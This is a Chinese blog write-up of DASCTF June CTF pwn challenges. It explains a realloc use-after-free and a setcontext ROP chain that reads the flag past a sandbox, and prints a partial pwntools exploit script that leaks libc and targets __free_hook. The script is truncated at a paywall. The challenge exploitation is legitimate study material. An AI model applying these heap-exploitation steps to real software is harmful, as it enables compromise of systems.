DASCTF 6月部分pwn wp

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量1k 收藏
点赞数
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43116977/article/details/106980565
版权

感觉质量挺高的,有点昏迷,

目录

Memory-Monster-IV

这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把:
http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/
我感觉能学到的东西不太多,至少知识是很简单的,就是你能不能调出来的问题。Orz。

oooooorder

这个题我其实一开始没找到洞,Whali3n51师傅一眼看出来了,Orz,
具体就是realloc函数的洞,当size=0时,heap会free掉,这样就形成了UAF了。知道这个洞,其实就很简单了,个人感觉是第一天内最好做的.
沙盒的话,用到了setcontext里的一段ROP,具体如下图所示
在这里插入图片描述
如图,如果我们能控制了rdi,也就可以控制所有寄存器。这里,我用这段ROP调用read函数,然后输入ORW的rop来读flag

from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('oooorder')
p = 0
def pwn(ip,port,debug):
	global p
	if(debug == 1):
		p = process('./oooorder')

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter("Your choice :\n","1")
		p.sendlineafter("How much is the order?\n",str(size))
		p.sendafter("Order notes:\n",content)
	def edit(index,content):
		p.sendlineafter("Your choice :\n","2")
		p.sendlineafter("Index of order:\n",str(index))
		p.sendafter("Order notes:\n",content)
	def show():
		p.sendlineafter("Your choice :\n","3")
	def free(index):
		p.sendlineafter("Your choice :\n","4")
		p.sendlineafter("Index of order:\n",str(index))

	for i in range(9):
		add(0x100,"x")
	add(0x10,"/bin/sh\x00")
	add(0x10,'x')
	add(0x10,'x')
	for i in range(8):
		free(i)
	add(0,'x')
	add(0,'x')
	show()
	p.recvuntil("[0]:")
	main_arena=u64(p.recv(6).ljust(8,"\x00"))
	print "main_arena=",hex(main_arena)
	#--link addr
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	libcbase_addr=main_arena-(0x7f9cfbb15ca0-0x7f9cfb72a000)
	free_hook=libcbase_addr+libc.symbols["__free_hook"]
	setcontent_addr=libcbase_addr+libc.symbols["setcontext"]
	pop_rdi_ret=libcbase_addr+libc.se
最低0.47元/天 解锁文章
starssgo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DASCTF部分赛题复现
weixin_44145820的博客
08-13 1070
目录PWNsecreteasyheap PWN secret 这题当时比赛的时候找到了先知上的一篇文章,研究了它的代码想在本题复现,但是总是不成功 看了大佬们的博客,发现这题居然这么简单Orz 简单说一下这题的原理: 本题先close了stdout,然后给写两字节和0x18字节的机会,之后close stderr和stdin 那么我们先分析一下fclose的源码,其核心函数是位于/libio/iofclose.c的_IO_new_fclose函数,其大致流程是:首先检查文件结构体指针,之后使用_IO_
DASCTFre方面wp
weixin_43990313的博客
06-28 378
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
DASCTF6Pwn-azez_heap wp
qq_31457355的博客
10-07 1189
本次比赛是dasctf6赛,学到了很多东西,感谢 1.首先着重记录一下azez_heap这个题目,剩下的题目放在另一篇博客 知识点: _IO_flush_all_lockp 触发条件 反向shell的利用 分析: checksec: 保护全开,毋庸置疑 通过ida分析可以确定程序的唯一漏洞点在edit里面,可以控制下一个堆块的fd和bk add里面size可以申请到0x2333已经很大了,根据以往的做题经验可以想到要打global_max_fast,而且堆块使用calloc分配,我们知道calloc
DASCTF X GFCTF 2024|四开启第一局
最新发布
qq_61670993的博客
04-21 877
简单题
安恒DASCTF团队挑战赛 Keyboard
Bok_choy的博客
07-14 1036
文件解压后得到这两个文件,raw文件是镜像文件,根据之前做题的经验,secret是内存取证 于是放进虚拟机使用volatility提取文件: 查看镜像版本 直接定向检索txt文件 将其dump下来 此时文件夹中多了一个以dat为后缀的文件 然后用strings查看内容: 显然我们得到了ctf关键信息 解密方式按照键盘字母解密 且提示密码是大写,解密得到 VERACRYPTPASSWORDISKEYBOARDDRAOBYEK 参考文献:https://ct...
Dasctf 6赛其余pwn WP
qq_31457355的博客
11-01 565
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
DASCTF2022十挑战赛部分WP
东隅的博客
10-25 1316
DASCTF2022十挑战赛部分WP.看题目源码,有4个类,开始的时候看到了fine类里面的call_user_func,最终应该是打进这个地方,另外看到了 secret_code 类里面的hint()函数,所以我的想法路线是先想办法调用出这个hint()函数,然后根据给出的hint进入那个call_user_func,然后就开始找链子,但是最终hint()函数给出的东西真是让我摸不到头脑,就只好不管这个hint直接打进call_user_func进行rce了。
2021DASCTF挑战赛WP
克格莫
08-31 444
1.签到 略。 2.[crypto]easymath 参考:https://zhuanlan.zhihu.com/p/363648238 exp: s_shift = 1862790884563160582365888530869690397667546628710795031544304378154769559410473276482265448754388655981091313419549689169381115573539422545933044902527020209259938095466283
2020五DASCTF
cwr1499640048的博客
07-01 1001
bbcrypto # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = 'flag{**
DASCTF安恒四赛web复现wp
xlcvv的博客
05-02 1124
趁着平台还开放,赶紧复现一下: Ezunserialize babytricks 一、Ezunserialize 题目给了源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } functio...
DASCTF2022.07赋能赛密码wp
mxx307的博客
07-26 1041
DASCTF2022.07赋能赛 密码 wp
2023年楚慧杯(DASCTF)WP
ZJPC007的博客
12-18 642
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。最后以一题之差屈居第二。
DASCTF6 pwn (oooorder secret Memory_Monster_IV springboard easyheap)
carol2358的博客
07-08 937
oooorder malloc可以从bin里取回可以保留内容, realloc size为0时会free这个chunk, 本题就有UAF漏洞了 先free然后再取回, 相同的两次操作拿到heap_base, libc_base, 然后uaf把free_hook覆盖为setcontext+53 后半部分是setcontext+orw(请自备flag文件),用在沙盒堆里, setcontext可以看这里, 计算距离rdi的偏移就行, 控制好0xa(rsp)和0xa8(rip) http://bl...
DASCTF2020-7部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 1958
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值